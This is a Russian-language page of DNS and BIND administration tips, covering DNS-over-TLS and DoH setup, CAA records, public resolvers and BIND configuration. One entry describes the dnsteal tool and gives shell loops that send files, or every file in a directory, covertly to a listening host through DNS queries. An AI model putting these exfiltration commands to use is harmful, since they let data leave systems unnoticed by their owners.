|
Организация шифрованного доступа к DNS-серверу BIND (DNS-over-TLS) при помощи nginx (доп. ссылка 1) |
[комментарии]
|
| Для предоставления клиентам возможности доступа к DNS-серверу на основе BIND с использованием протокола DNS-over-TLS можно настроить TLS-прокси с использованием nginx.
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Защита от подмены серверных TLS-сертификатов в результате MITM-атаки провайдером (доп. ссылка 1) (доп. ссылка 2) |
[комментарии]
|
| Для предотвращения получения TLS-сертификатов третьими лицами, которые в ходе
MITM-атаки могут контролировать трафик сервера, рекомендовано использовать
DNS-запись CAA, через которую можно указать какой именно удостоверяющий центр и
какая именно учётная запись в этом удостоверяющем центре авторизированы на
выдачу сертификата для домена.
CAA поддерживается в Let's Encrypt и не позволяет запросить сертификат,
используя другой ACME-ключ. Для включения привязки в DNS-зону следует добавить:
для привязки домена example.com к удостоверяющему центру letsencrypt.org:
example.com. IN CAA 0 issue "letsencrypt.org"
для дополнительно привязки к учётной записи acme-v02.api.letsencrypt.org/acme/acct/1234567890
example.com. IN CAA 0 issue "letsencrypt.org; accounturi=https://acme-v02.api.letsencrypt.org/acme/acct/1234567890"
DNS-сервер должен быть размещён на отдельном сервере, не подверженном
MITM-атаке. Для дополнительной защиты от подмены DNS необходимо использовать
протокол DNSSEC, который помешает атакующим подменить DNS-ответы с записью CAA.
Дополнительно рекомендовано через Tor или внешние хосты наладить автоматический
мониторинг отсутствия подмены сертификатов, и подключиться к сервисам
мониторинга CT-логов (Certificate Transparency, отражают выданные
удостоверяющими центрами сертификаты) или вручную отслеживать появление
незапрошенных сертификатов в CT-логах (https://crt.sh/). Также рекомендовано
выбирать размещённых в разных странах операторов хостинга, регистрации домена,
DNS и удостоверяющих центров.
|
|
|
|
|
Включение DNS over TLS в Fedora (доп. ссылка 1) |
[комментарии]
|
| Включаем DNSOverTLS в настройках systemd-resolved.
/etc/systemd/resolved.conf
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Включение DNS-over-HTTPS в Chrome (доп. ссылка 1) |
[комментарии]
|
| В феврале в кодовую базу Chromium без лишней огласки была [[https://chromium.googlesource.com/chromium/src.git/+/786929ad1cfbc97962ff5672e2469460ff535f41 добавлена]] недокументированная возможность использования DNS-over-HTTPS (DoH). Если в обычной ситуации DNS-запросы напрямую отправляются на определённые в конфигурации системы DNS-серверы, то в случае DoH запрос на определение IP-адреса хоста инкапсулируется в трафик HTTPS и отправляется на HTTP-сервер, на котором резолвер обрабатывает запросы через Web API. Существующий стандарт DNSSEC использует шифрование лишь для аутентификации клиента и сервера, но не защищает трафик от перехвата и не гарантирует конфиденциальность запросов.
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Список общедоступных DNS-резолверов |
[комментарии]
|
|
8.8.8.8, 8.8.4.4 - Google (поддерживается DNS over TLS)
1.1.1.1, 1.0.0.1 - CloudFlare (поддерживается DNS over TLS)
9.9.9.9, 149.112.112.112 - Quad9 (блокируются вредоносные хосты и поддерживается DNS over TLS)
77.88.8.7, 77.88.8.3 - Yandex (блокируются вредоносные хосты)
208.67.222.222, 208.67.220.220 - OpenDNS/Cisco (блокируются вредоносные
хосты и сайты для взрослых, поддерживается DNSCrypt и DNS over TLS))
8.26.56.26, 8.20.247.20 - Comodo (блокируются вредоносные хосты,
поддерживается DNSCrypt и DNS over TLS)
185.228.168.168, 185.228.169.168 - CleanBrowsing.org (блокируется хосты с
сайтами для взрослых, поддерживается DNSCrypt)
84.200.69.80, 84.200.70.40 - DNS Watch (не ведутся логи)
37.235.1.174, 37.235.1.177 - FreeDNS (не ведутся логи)
45.77.165.194, 45.32.36.36 - Fourth Estate (не ведутся логи)
91.239.100.100, 89.233.43.71 - UncensoredDNS (первый anycast, второй размещён в Дании)
64.6.64.6, 64.6.65.6 - Verisign
4.2.2.[1-6] - Level 3 Communications (4.2.2.1 - 4.2.2.6)
|
|
|
|
|
Включение ESNI и DNS over HTTPS в Firefox (доп. ссылка 1) |
[комментарии]
|
| Включения network.security.esni.enabled=true в about:config недостаточно для активации в Firefox TLS-расширения ESNI (Encrypted Server Name Indication), обеспечивающего шифрование данных о хосте, запрашиваемом в рамках HTTPS-соединения.
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Скрытая отправка файлов через DNS |
[комментарии]
|
| В рамках проекта https://github.com/m57/dnsteal развивается фиктивный
DNS-сервер, позволяющий организовать скрытую отправку файлов по протоколу DNS,
используя штатные системные утилиты резолвинга. Для уменьшения трафика
поддерживается сжатие передаваемого содержимого.
Запускаем сервер ("-z" - включает сжатие):
python dnsteal.py 192.168.1.1 -z
Для отправки файла send.txt на внешний хост 192.168.1.1, на котором запущен
dnsteal, достаточно выполнить:
for b in $(gzip -c send.txt | xxd -p); do dig @192.168.1.1 $b.filename.com; done
Для отправки всех файлов из текущей директории
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @192.168.1.1 %b.$filename.com; done; done
|
|
|
|
|
Настройка CustomDNS (DynDNS) на маршрутизаторе Cisco |
Автор: serg-dn
[комментарии]
|
| Шаблон настроек Cisco IOS для обновления хоста MyHost своего домена My-DNS-Domain.com в DynDNS. Конфигурация для ADSL. Проверено на Cisco IOS Software, C870 Software (C870-ADVIPSERVICESK9-M), Version 12.4(24)T4. Для обновления раз в час необходима подписка на услугу DynDNS Pro, для корректной регистрации должна быть активирована услуга Custom DNS.
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Организация работы Opera и других приложений через Socks (доп. ссылка 1) |
[комментарии]
|
| Если на локальной машине кроме socks имеется выход в интернет или доступ к DNS-резолверу, проблем не возникает, но если выход машины производится только через socks при запуске программ подобных браузеру opera всплывает неприятная проблема с резолвингом имен. Проблема в том, что утилиты подобные tsocks не позволяют перенаправлять DNS запросы через Socks и организовать работу резолвера поверх этого протокола.
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Настройка Dynamic DNS на базе Bind9 и nsupdate (доп. ссылка 1) |
Автор: Stepanoff
[комментарии]
|
| В данном руководстве описано как настроить динамическое обновление зоны DNS с удаленной машины, например с DHCP сервера, или если адрес выдается динамически, как при использовании ADSL. Описано как простое обновление зоны вручную, или по крону, так и обновление зоны DHCP сервером при выдаче ip-адреса клиенту. Настройка идентична для всех дистрибутивов и ОС (Linux, FreeBSD, Mac OS и прочих систем где есть Bind9).
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Автоматизация создания массовых записей на DNS-сервере Bind |
[комментарии]
|
| Для заведения типовых записей внутри DNS зоны, например, строк вида "adsl-1-2-3-4.pool.test.ru удобно использовать директиву "$GENERATE".
При помощи $GENERATE можно массово создавать элементы для записей A, CNAME, DNAME, NS и PTR.
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Автоматическое изменение правил IPTABLES для IP адресов из записей DynDNS (доп. ссылка 1) |
Автор: zaikini
[комментарии]
|
| Возникла задача предоставить сервис для клиентов, использующих внешние динамические адреса.
Доступ к сервису ограничен правилами IPTABLES.
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Как удалить из кэша DNS сервера Bind конкретную запись, без перезагрузки всего кэша |
Автор: Константин Брызгалов
[комментарии]
|
| Для удаления отдельной записи в кэше Bind нужно использовать команду "rndc flushname"
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
MAC DNS лист |
Автор: Vladimir Shingarev
[комментарии]
|
| Иногда нужно узнать какому производителю принадлежит оконечное оборудование,
наблюдая только его мак на интерфейсе. А открывать браузер для этого лениво.
В таком случае удобно создать MAC-based dns лист. Пользоваться просто:
ket:/home/sva# host -t txt 001243.macl.nov.ru
001243.macl.nov.ru descriptive text "Cisco"
ket:/home/sva# host -t txt 0050ba.macl.nov.ru
0050ba.macl.nov.ru descriptive text "D-LINK"
|
|
|
|
|
DNS: Как делегировать неполную (не /24) сеть in-addr.arpa клиенту |
Автор: nikl
[комментарии]
|
| Предположим, вы провайдер (provider1) и подключившийся к вам клиент (firma1) взял в пользование сеть /28
Как обеспечить ему самостоятельное управление обратными доменами в его подсети?
Можно делигировать ему неполную сеть, на примере:
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Решение проблемы резолвинга при включенных forwarders в BIND 9 |
Автор: Vladimir V. Kamarzin
[комментарии]
|
| Если bind 9 одновременно является переадресующим сервером ( forwarders { s.o.m.e; }; ) и авторитативным
для какой-либо зоны, при делегировании подзоны возникает проблема резолвинга хостов этой подзоны:
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Почему на некоторые запросы named слишком долго (1-4 сек.) резолвит имя (доп. ссылка 1) |
[комментарии]
|
| Проблемы на IPv4 хостах без IPv6 коннективити, обусловлены появлением IPv6
адресов у B и A корневых NS.
Решение представлено в BIND 9.2.5 и 9.3.1, которые еще не вышли.
Другой путь - собрать bind с ./configure --disable-ipv6 или запустить с опцией -4 (для bind 9.3.0).
|
|
|
|
|
Пример ведения расширенных логов в named |
[комментарии]
|
| # named.conf
# для более делаьной информации о трансферах расскомментируйте "severity info"
logging {
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
|
Оптимизация работы DNS резолвера, случайный выбор NS (доп. ссылка 1) |
[обсудить]
|
| В /etc/resolv.conf:
options attempts=2, timeout=2, rotate
,где attempts - число попыток посылки запроса к серверу.
timeout - таймаут запроса (по умолчанию 5 сек.)
rotate случайный выбор nameserver из списка, а не опрос по порядку.
timeout - таймаут за который сервер должен успеть ответить.
Для отладки удобно использовать "options debug"
|
|
|
|
|
Как организовать рекурсивные запросы только через жестко определенные сервера. |
[обсудить]
|
| options {
# Если "first" - то если forwarders не ответил - запрашиваем сами.
# Если "only" - сами никогда не запрашиваем, только через forwarders.
forward only;
forwarders {192.168.1.1; 192.168.2.1;};
};
|
|
|
|
|
Как запретить рекурсивные запросы через DNS сервер для чужих клиентов |
[комментарии]
|
| acl localnet { 192.168.1.0/24; 10.0.1.0/24; };
options {
allow-recursion {localnet; 192.168.2.0/24};
# Полностью запросы можно ограничить через "allow-query" или "blackhole"
};
|
|
|
|
|
Как запретить Bind показывать свою версию для внешнего мира. (доп. ссылка 1) |
[комментарии]
|
| Узнать версию можно через:
dig @ns.test.ru version.bind chaos txt
Чтобы запретить, нужно в options блоке named.conf прописать:
options {
...
version "0.1";
};
|
|
|
|
|
Как разрешить полный трансфер DNS зоны только для избранных серверов. |
[обсудить]
|
| zone "host.ru" {
type master;
allow-transfer { 1.2.3.4; 1.2.3.5; 1.2.3.6;};
file "host.ru";
}
|
|
|
|
|
Как избавиться от ограничения числа одновременных коннектов к named |
[обсудить]
|
| options {
directory "/etc/namedb";
recursive-clients 5000;
tcp-clients 500;
};
|
|
|
|
|
Включение DNS-over-HTTPS на системном уровне в KDE neon и Ubuntu |
Автор: popov895
[комментарии]
|
| В этой заметке я не буду объяснять, [[https://www.google.com/search?channel=fs&client=ubuntu&q=why+should+i+use+doh почему]] предпочтительно использовать DNS-over-HTTPS (DoH), а просто опишу, как его можно включить на системном уровне в KDE neon / Ubuntu. [[B]]Внимание: не забывайте делать резервные копии системных файлов, которые планируете редактировать![[/B]]
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Настройка DNSSEC в BIND 9.9 (доп. ссылка 1) (доп. ссылка 2) |
[комментарии]
|
| В [[https://www.opennet.ru/opennews/art.shtml?num=33229 BIND 9.9]] появились новые средства для автоматизации формирования цифровых подписей и управления ключами, позволяющие добавить поддержку DNSSEC без правки DNS-зон.
... [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение]
|
|
|
|
|
Как в DNS прописать два образа одной и той же зоны для внутренней и внешней сети. |
Автор: uldus
[комментарии]
|
| view "internal" {
match-clients { 192.168.0.0/16; };
zone "test.ru" {
type master;
file "test.ru.int";
};
};
view "external" {
match-clients { any; };
zone "test.ru" {
type master;
file "test.ru.ext";
};
};
|
|
|
|